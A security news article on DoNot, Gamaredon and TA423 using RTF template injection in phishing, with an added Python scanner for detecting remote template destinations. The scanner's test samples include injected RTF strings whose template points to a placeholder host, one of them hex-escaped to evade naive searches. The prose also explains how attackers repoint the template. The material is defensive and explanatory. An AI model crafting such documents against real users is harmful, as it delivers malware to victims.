
DoNot APT Group Using a New Attack Method in Phishing Campaigns

Three state-sponsored threat actors linked to China, India and Russia have been observed using a new RTF (Rich Text Format) template injection technique to deliver malware to targeted systems as part of their phishing operations.

Researchers reported that "RTF template injection is a new method that is suitable for malicious phishing attachments since it is straightforward and allows threat actors to retrieve malicious content from a remote URL using an RTF."

At the centre of the attack is an RTF file containing decoy content. The file is altered so that, when it is opened, it retrieves content, including malicious payloads, hosted at an external URL. The technique abuses the RTF template control word: the attacker edits the document's formatting properties (a hex editor is enough) so that the template destination points to a URL resource rather than a local file resource, and the remote payload is fetched from that URL when the document is rendered.

The same idea applies to Office documents. Attackers can send what appear to be legitimate Office files (DOC, XLS or PPT) to victims; when the Office application builds the document content, the template function loads the malicious code from the remote location.
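The template destination described above is easy to find in an RTF file once you know what to look for, so the natural defensive check is a scanner that pulls every `\template` destination out of a document and flags any that would make Word reach out over the network. The following is an added example written for this page, not code from the original article or from Proofpoint's report, and the three RTF documents in it are constructed samples rather than the APT files discussed. Beyond the plain case in the text, it also decodes RTF hex escapes (`\'hh`) in the destination, because a URL written that way is still valid RTF and slips past a naive search for the string "http", and it treats UNC paths as remote as well as URLs.

```python
import re

# --- Constructed sample documents (not real malware, not the APT samples) ---

# Benign: the template destination is a local path.
BENIGN_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}"
    rb"{\*\template C:\\Users\\alice\\Templates\\letter.dotx}"
    rb"\f0 Quarterly report\par}"
)

# Injected: the destination is a remote URL (example.invalid is a placeholder),
# so Word fetches it when the document is opened.
INJECTED_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}"
    rb"{\*\template http://example.invalid/t.dotm}"
    rb"\f0 Defence budget 2021\par}"
)

# Same idea with the scheme spelled out as RTF hex escapes (\'hh), which is
# legal RTF and defeats a naive search for the string "http".
OBFUSCATED_RTF = (
    rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70s://example.invalid/t.dotm}"
    rb"Hello\par}"
)

TEMPLATE_GROUP_RE = re.compile(rb"\{\\(?:\*\\)?template(?![a-zA-Z])")
CONTROL_WORD_RE = re.compile(rb"\\[a-zA-Z]+-?\d* ?")
HEX_BYTE_RE = re.compile(rb"[0-9A-Fa-f]{2}")
# A URL scheme, or a UNC path such as \\server\share\x.dotm.
REMOTE_RE = re.compile(r"^(?:https?|ftp|file)://|^\\\\[^\\]+\\", re.IGNORECASE)


def looks_like_rtf(data: bytes) -> bool:
    """Word parses by content, not extension: a .doc that starts with {\\rtf is RTF."""
    return data.lstrip().startswith(b"{\\rtf")


def _read_group_body(data: bytes, start: int) -> bytes:
    """Return bytes from start up to the '}' that closes the group opened before start."""
    depth = 0
    i = start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":          # skip an escaped char or the first letter of a control word
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            if depth == 0:
                return data[start:i]
            depth -= 1
        i += 1
    return data[start:]         # unterminated group: take what is there


def _decode_destination(raw: bytes) -> str:
    """Resolve RTF escapes (\\'hh, \\\\, \\{, \\}) and drop any other control words."""
    out = bytearray()
    i = 0
    while i < len(raw):
        if raw[i:i + 1] != b"\\":
            out.append(raw[i])
            i += 1
            continue
        nxt = raw[i + 1:i + 2]
        if nxt == b"'" and HEX_BYTE_RE.fullmatch(raw[i + 2:i + 4]):
            out.append(int(raw[i + 2:i + 4], 16))   # \'hh: one byte given in hex
            i += 4
        elif nxt in (b"\\", b"{", b"}"):           # escaped literal character
            out += nxt
            i += 2
        else:                                      # control word or symbol: skip it
            m = CONTROL_WORD_RE.match(raw, i)
            i = m.end() if m else i + 2
    return out.decode("latin-1").strip()


def extract_templates(data: bytes) -> list[str]:
    """Every \\template destination in the document, decoded to a plain string."""
    return [
        _decode_destination(_read_group_body(data, m.end()))
        for m in TEMPLATE_GROUP_RE.finditer(data)
    ]


def remote_templates(data: bytes) -> list[str]:
    """Destinations that would make Word reach out over the network (URL or UNC path)."""
    if not looks_like_rtf(data):
        return []
    return [d for d in extract_templates(data) if REMOTE_RE.match(d)]


if __name__ == "__main__":
    samples = (("benign", BENIGN_RTF), ("injected", INJECTED_RTF), ("obfuscated", OBFUSCATED_RTF))
    for name, doc in samples:
        print(name, remote_templates(doc))
```

Two points for anyone turning this into a detection rule: the `{\*\template ...}` group does not have to sit at any fixed offset in the header, so match on the control word rather than on a byte position, and decode escapes before classifying the destination rather than grepping the raw file for `http`. A hit means the document will attempt a network fetch on open; it is worth correlating with proxy logs for a request to that destination from the workstation that opened the file.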

Template injection attacks have been around for some time, but they became more common in 2020, when "remote template injection" became a favoured approach among several APT groups.

As early as February 2021, Proofpoint observed template-injection RTF files linked to the APT groups DoNot Team, Gamaredon and a China-linked actor tracked as TA423. The adversaries used the files to target entities in Pakistan, Sri Lanka and Ukraine, as well as organisations in the deep-water energy exploration sector in Malaysia, using defence-themed and other country-specific lures.

DoNot and TA423 were the first to use the technique, employing RTF documents with malicious templates as early as March this year; DoNot registered its first domains for the campaign then and began its first attacks a month later.

Gamaredon, a group recently identified by Ukraine as being operated by Russia's FSB intelligence service, is the most recent APT to adopt the tactic, most prominently in an October operation that used RTF files crafted to look like Ukrainian government documents.

Finally, the researchers concluded that "threat actors' creativity in bringing this strategy to a new file format in RTFs signifies an expanded surface area of threat for companies around the world. While this strategy is presently used by a small number of sophisticated APT actors, its effectiveness paired with its ease of usage is expected to promote its adoption even farther throughout the threat landscape."
